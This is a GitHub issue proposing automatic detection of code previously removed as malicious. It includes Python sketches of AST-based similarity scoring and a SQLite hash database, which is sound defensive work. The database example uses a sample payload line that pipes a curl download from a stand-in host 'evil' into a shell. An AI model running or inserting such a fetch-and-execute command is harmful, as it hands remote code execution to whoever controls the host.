feature: automatically identify code removed previously for being malicious. #95

Open

AngeloD2022 opened this issue Apr 13, 2023 · 0 comments

Contributor

AngeloD2022 commented Apr 13, 2023

A couple of ideas for approaching this (just spitballing; better solutions may well exist):

- Taking a cryptographic hash of a file (language-agnostic, but inflexible to even minor code changes).
- Computing a locality-sensitive hash of the malicious file from its opcode disassembly or AST features (Python-specific).
  - The similarity of another file to a known malicious file could then be measured as the Levenshtein distance between the two files' hashes.
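
A rough sketch of how the two ideas differ in practice, using only the standard library. All function names here are hypothetical. The standard library has no locality-sensitive hash, so this stand-in compares the raw sequence of AST node type names with Levenshtein distance instead of hashing it first; a real implementation would presumably swap in a proper fuzzy hash.

```python
import ast
import hashlib


def sha256_of_source(source: str) -> str:
    """Exact-match fingerprint: any edit at all produces a different digest."""
    return hashlib.sha256(source.encode("utf-8")).hexdigest()


def ast_fingerprint(source: str) -> list:
    """Sequence of AST node type names (stand-in for a locality-sensitive hash).

    Identifiers, literal values, comments and whitespace are ignored,
    so simple renames do not change the fingerprint.
    """
    return [type(node).__name__ for node in ast.walk(ast.parse(source))]


def levenshtein(a, b) -> int:
    """Edit distance between two sequences (row-by-row dynamic programming)."""
    previous = list(range(len(b) + 1))
    for i, item_a in enumerate(a, start=1):
        current = [i]
        for j, item_b in enumerate(b, start=1):
            cost = 0 if item_a == item_b else 1
            current.append(min(previous[j] + 1,          # deletion
                               current[j - 1] + 1,       # insertion
                               previous[j - 1] + cost))  # substitution
        previous = current
    return previous[-1]


def similarity(source_a: str, source_b: str) -> float:
    """Score in [0, 1]; 1.0 means the two fingerprints are identical."""
    fa, fb = ast_fingerprint(source_a), ast_fingerprint(source_b)
    longest = max(len(fa), len(fb))  # always >= 1: every parse yields a Module node
    return 1.0 - levenshtein(fa, fb) / longest


known_bad = "import os\nx = os.environ['HOME']\nprint(x)\n"
renamed = "import os\ny = os.environ['HOME']\nprint(y)\n"

# The cryptographic hash misses the renamed copy; the structural comparison does not.
print(sha256_of_source(known_bad) == sha256_of_source(renamed))
print(similarity(known_bad, renamed))
```

Any cutoff on the similarity score would need tuning against real samples, since unrelated but structurally simple files can also score high.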

This would obviously require a database of some sort, to which the hashes of malicious files would be committed in response to reports.
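
As a minimal sketch of what such a database might look like, here is an exact-match lookup backed by SQLite. The table name, column names, and function names are all made up for illustration, and a real store would likely also hold fuzzy fingerprints rather than only SHA-256 digests.

```python
import hashlib
import sqlite3


def open_db(path: str = ":memory:") -> sqlite3.Connection:
    """Open (or create) the hash database; the schema is hypothetical."""
    conn = sqlite3.connect(path)
    conn.execute(
        "CREATE TABLE IF NOT EXISTS malicious_hashes ("
        "sha256 TEXT PRIMARY KEY, note TEXT)"
    )
    return conn


def report_malicious(conn: sqlite3.Connection, content: bytes, note: str = "") -> str:
    """Record the digest of a file that was reported as malicious."""
    digest = hashlib.sha256(content).hexdigest()
    # INSERT OR IGNORE keeps repeated reports of the same file harmless.
    conn.execute(
        "INSERT OR IGNORE INTO malicious_hashes (sha256, note) VALUES (?, ?)",
        (digest, note),
    )
    conn.commit()
    return digest


def is_known_malicious(conn: sqlite3.Connection, content: bytes) -> bool:
    """Exact-match lookup of a file's digest against the recorded hashes."""
    digest = hashlib.sha256(content).hexdigest()
    row = conn.execute(
        "SELECT 1 FROM malicious_hashes WHERE sha256 = ?", (digest,)
    ).fetchone()
    return row is not None


conn = open_db()
report_malicious(conn, b"import os; os.system('curl evil | sh')", note="example report")
print(is_known_malicious(conn, b"import os; os.system('curl evil | sh')"))
print(is_known_malicious(conn, b"print('hello')"))
```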